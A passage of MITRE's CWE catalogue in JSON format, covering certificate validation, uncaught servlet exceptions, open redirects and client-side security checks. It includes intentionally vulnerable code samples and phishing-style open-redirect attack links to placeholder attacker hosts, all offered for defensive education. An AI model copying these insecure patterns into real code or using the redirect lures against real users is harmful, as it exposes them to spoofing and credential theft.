Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description"}],"Previous_Entry_Name":[{"#text":"Information Leak Through GET Request","attr":{"@_Date":"2008-04-11"}},{"#text":"Information Leak Through Query Strings in GET Request","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Query Strings in GET Request","attr":{"@_Date":"2020-02-24"}}]}},"599":{"attr":{"@_ID":"599","@_Name":"Missing Validation of OpenSSL Certificate","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses OpenSSL and trusts or uses a certificate without using the SSL_get_verify_result() function to ensure that the certificate satisfies all necessary security requirements.","Extended_Description":"This could allow an attacker to use an invalid certificate to claim to be a trusted host, use expired certificates, or conduct other attacks that could be detected if the certificate is properly validated.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The data read may not be properly secured, it might be viewed by an attacker."},{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"Trust afforded to the system in question may allow for spoofing or redirection attacks."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If the certificate is not checked, it may be possible for a redirection or spoofing attack to allow a malicious host with a valid certificate to provide data under the guise of a trusted host. While the attacker in question may have a valid certificate, it may simply be a valid certificate for a different site. In order to ensure data integrity, we must check that the certificate is valid, and that it pertains to the site we wish to access."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that proper authentication is included in the system design."},{"Phase":"Implementation","Description":"Understand and properly implement all checks necessary to ensure the identity of entities involved in encrypted communications."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-125"},"Intro_Text":"The following OpenSSL code ensures that the host has a certificate.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","","","",""],"xhtml:i":["// got certificate, host can be trusted","//foo=SSL_get_verify_result(ssl);","//if (X509_V_OK==foo) ..."]}}}},"Body_Text":"Note that the code does not call SSL_get_verify_result(ssl), which effectively disables the validation step that checks the certificate."}},"Notes":{"Note":{"#text":"CWE-295 and CWE-599 are very similar, although CWE-599 has a more narrow scope that is only applied to OpenSSL certificates. As a result, other children of CWE-295 can be regarded as children of CWE-599 as well. CWE\'s use of one-dimensional hierarchical relationships is not well-suited to handle different kinds of abstraction relationships based on concepts like types of resources (\\"OpenSSL certificate\\" as a child of \\"any certificate\\") and types of behaviors (\\"not validating expiration\\" as a child of \\"improper validation\\").","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"No OpenSSL Certificate Check Performed before Use","attr":{"@_Date":"2008-04-11"}},{"#text":"Trust of OpenSSL Certificate Without Validation","attr":{"@_Date":"2013-02-21"}}]}},"600":{"attr":{"@_ID":"600","@_Name":"Uncaught Exception in Servlet","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The Servlet does not catch all exceptions, which may reveal sensitive debugging information.","Extended_Description":"When a Servlet throws an exception, the default error response the Servlet container sends back to the user typically includes debugging information. This information is of great value to an attacker. For example, a stack trace might show the attacker a malformed SQL query string, the type of database being used, and the version of the application container. This information enables the attacker to target known vulnerabilities in these components.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"248","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"209","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"390","@_View_ID":"1000"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Missing Catch Block"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Availability"],"Impact":["Read Application Data","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Implement Exception blocks to handle all types of Exceptions."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-39"},"Intro_Text":"The following example attempts to resolve a hostname.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {}","xhtml:div":{"#text":"String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println(\\"hello \\" + addr.getHostName());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"A DNS lookup failure will cause the Servlet to throw an exception."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR01-J","Entry_Name":"Do not allow exceptions to expose sensitive information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"Notes":{"Note":{"#text":"The \\"Missing Catch Block\\" concept is probably broader than just Servlets, but the broader concept is not sufficiently covered in CWE.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Alternate_Terms, Description, Maintenance_Notes, Name, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Missing Catch Block","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Catch All Exceptions (Missing Catch Block)","attr":{"@_Date":"2009-03-10"}},{"#text":"Failure to Catch All Exceptions in Servlet","attr":{"@_Date":"2010-12-13"}}]}},"601":{"attr":{"@_ID":"601","@_Name":"URL Redirection to Untrusted Site (\'Open Redirect\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.","Extended_Description":"An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Phishing is a general term for deceptive attempts to coerce private information from users that will be used for identity theft."},"Alternate_Terms":{"Alternate_Term":[{"Term":"Open Redirect"},{"Term":"Cross-site Redirect"},{"Term":"Cross-domain Redirect"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"The user may be redirected to an untrusted page that contains malware which may then compromise the user\'s machine. This will expose the user to extensive risk and the user\'s interaction with the web server may also be compromised if the malware conducts keylogging or other attacks that steal credentials, personally identifiable information (PII), or other important data."},{"Scope":["Access Control","Confidentiality","Other"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity","Other"],"Note":"The user may be subjected to phishing attacks by being redirected to an untrusted page. The phishing attack may point to an attacker controlled web page that appears to be a trusted web site. The phishers may then steal the user\'s credentials and then use these credentials to access the legitimate web site."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-10"},"Method":"Manual Static Analysis","Description":"Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints.","Effectiveness":"High"},{"Method":"Automated Dynamic Analysis","Description":"Automated black box tools that supply URLs to every input may be able to spot Location header modifications, but test case coverage is a factor, and custom redirects may not be detected."},{"Method":"Automated Static Analysis","Description":"Automated static analysis tools may not be able to determine whether input influences the beginning of a URL, which is important for reducing false positives."},{"Method":"Other","Description":"Whether this issue poses a vulnerability will be subject to the intended behavior of the application. For example, a search engine might intentionally provide redirects to arbitrary URLs."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","Use a list of approved URLs or domains to be used for redirection."]}},{"Phase":"Architecture and Design","Description":"Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving the current site. Implement a long timeout before the redirect occurs, or force the user to click on the link. Be careful to avoid XSS problems (CWE-79) when generating the disclaimer page."},{"attr":{"@_Mitigation_ID":"MIT-21.2"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":{"xhtml:p":["When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.","For example, ID 1 could map to \\"/login.asp\\" and ID 2 could map to \\"http://www.example.com/\\". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability."]}},{"Phase":"Architecture and Design","Description":"Ensure that no externally-supplied requests are honored by requiring that all redirect requests include a unique nonce generated by the application [REF-483]. Be sure that the nonce is not predictable (CWE-330).","Effectiveness_Notes":"Note that this can be bypassed using XSS (CWE-79)."},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Many open redirect problems occur because the programmer assumed that certain inputs could not be modified, such as cookies and hidden form fields."]}},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code obtains a URL from the query string and then redirects the user to that URL.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$redirect_url = $_GET[\'url\'];header(\\"Location: \\" . $redirect_url);","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://example.com/example.php?url=http://malicious.example.com"}],"Body_Text":["The problem with the above code is that an attacker could use this page as part of a phishing scam by redirecting users to a malicious site. For example, assume the above code is in the file example.php. An attacker could supply a user with the following link:","The user sees the link pointing to the original trusted site (example.com) and does not realize the redirection that could take place."]},{"Intro_Text":"The following code is a Java servlet that will receive a GET request with a url parameter in the request to redirect the browser to the address specified in the url parameter. The servlet will retrieve the url parameter value from the request and send a response to redirect the browser to the url address.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RedirectServlet extends HttpServlet {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"#text":"String query = request.getQueryString();if (query.contains(\\"url\\")) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"String url = request.getParameter(\\"url\\");response.sendRedirect(url);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}},{"attr":{"@_Nature":"attack","@_Language":"HTML"},"xhtml:div":"<a href=\\"http://bank.example.com/redirect?url=http://attacker.example.net\\">Click here to log in</a>"}],"Body_Text":["The problem with this Java servlet code is that an attacker could use the RedirectServlet as part of a e-mail phishing scam to redirect users to a malicious site. An attacker could send an HTML formatted e-mail directing the user to log into their account by including in the e-mail the following link:","The user may assume that the link is safe since the URL starts with their trusted bank, bank.example.com. However, the user will then be redirected to the attacker\'s web site (attacker.example.net) which the attacker may have made to appear very similar to bank.example.com. The user may then unwittingly enter credentials into the attacker\'s web page and compromise their bank account. A Java servlet should never redirect a user to a URL without verifying that the redirect address is a trusted site."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-4206","Description":"URL parameter loads the URL into a frame and causes it to appear to be part of a valid page.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4206"},{"Reference":"CVE-2008-2951","Description":"An open redirect vulnerability in the search script in the software allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL as a parameter to the proper function.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2951"},{"Reference":"CVE-2008-2052","Description":"Open redirect vulnerability in the software allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the proper parameter.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2052"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":38,"Entry_Name":"URl Redirector Abuse"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-483"}},{"attr":{"@_External_Reference_ID":"REF-484","@_Section":"Page 43"}},{"attr":{"@_External_Reference_ID":"REF-485"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Background_Details, Description, Detection_Factors, Likelihood_of_Exploit, Name, Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-03","Modification_Comment":"updated References and Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Alternate_Terms, Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Detection_Factors, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Unsafe URL Redirection","attr":{"@_Date":"2008-04-11"}},{"#text":"URL Redirection to Untrusted Site","attr":{"@_Date":"2008-09-09"}},{"#text":"URL Redirection to Untrusted Site (aka \'Open Redirect\')","attr":{"@_Date":"2009-05-27"}}]}},"602":{"attr":{"@_ID":"602","@_Name":"Client-Side Enforcement of Server-Side Security","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software is composed of a server that relies on the client to implement a mechanism that is intended to protect the server.","Extended_Description":"When the server relies on protection mechanisms placed on the client side, an attacker can modify the client-side behavior to bypass the protection mechanisms resulting in potentially unexpected interactions between the client and server. The consequences will vary, depending on what the mechanisms are trying to protect.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"290","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"300","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Architecture and Design","Note":"Consider a product that consists of two or more processes or nodes that must interact closely, such as a client/server model. If the product uses protection schemes in the client in order to defend from attacks against the server, and the server does not use the same schemes, then an attacker could modify the client in a way that bypasses those schemes. This is a fundamental design flaw that is primary to many weaknesses."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Access Control","Availability"],"Impact":["Bypass Protection Mechanism","DoS: Crash, Exit, or Restart"],"Note":"Client-side validation checks can be easily bypassed, allowing malformed or unexpected input to pass into the application, potentially as trusted data. This may lead to unexpected states, behaviors and possibly a resulting crash."},{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"Client-side checks for authentication can be easily bypassed, allowing clients to escalate their access levels and perform unintended actions."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.","Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings."]}},{"Phase":"Architecture and Design","Description":"If some degree of trust is required between the two entities, then use integrity checking and strong authentication to ensure that the inputs are coming from a trusted source. Design the product so that this trust is managed in a centralized fashion, especially if there are complex or numerous communication channels, in order to reduce the risks that the implementer will mistakenly omit a check in a single code path."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example contains client-side code that checks if the user authenticated successfully before sending a command. The server-side code performs the authentication in one step, and executes the command in a separate step.","Body_Text":["CLIENT-SIDE (client.pl)","SERVER-SIDE (server.pl):","The server accepts 2 commands, \\"AUTH\\" which authenticates the user, and \\"CHANGE-ADDRESS\\" which updates the address field for the username. The client performs the authentication and only sends a CHANGE-ADDRESS for that user if the authentication succeeds. Because the client has already performed the authentication, the server assumes that the username in the CHANGE-ADDRESS is the same as the authenticated user. An attacker could modify the client by removing the code that sends the \\"AUTH\\" command and simply executing the CHANGE-ADDRESS."],"Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Perl"},"xhtml:div":{"#text":"$server = \\"server.example.com\\";$username = AskForUserName();$password = AskForPassword();$address = AskForAddress();$sock = OpenSocket($server, 1234);writeSocket($sock, \\"AUTH $username $password\\\\n\\");$resp = readSocket($sock);if ($resp eq 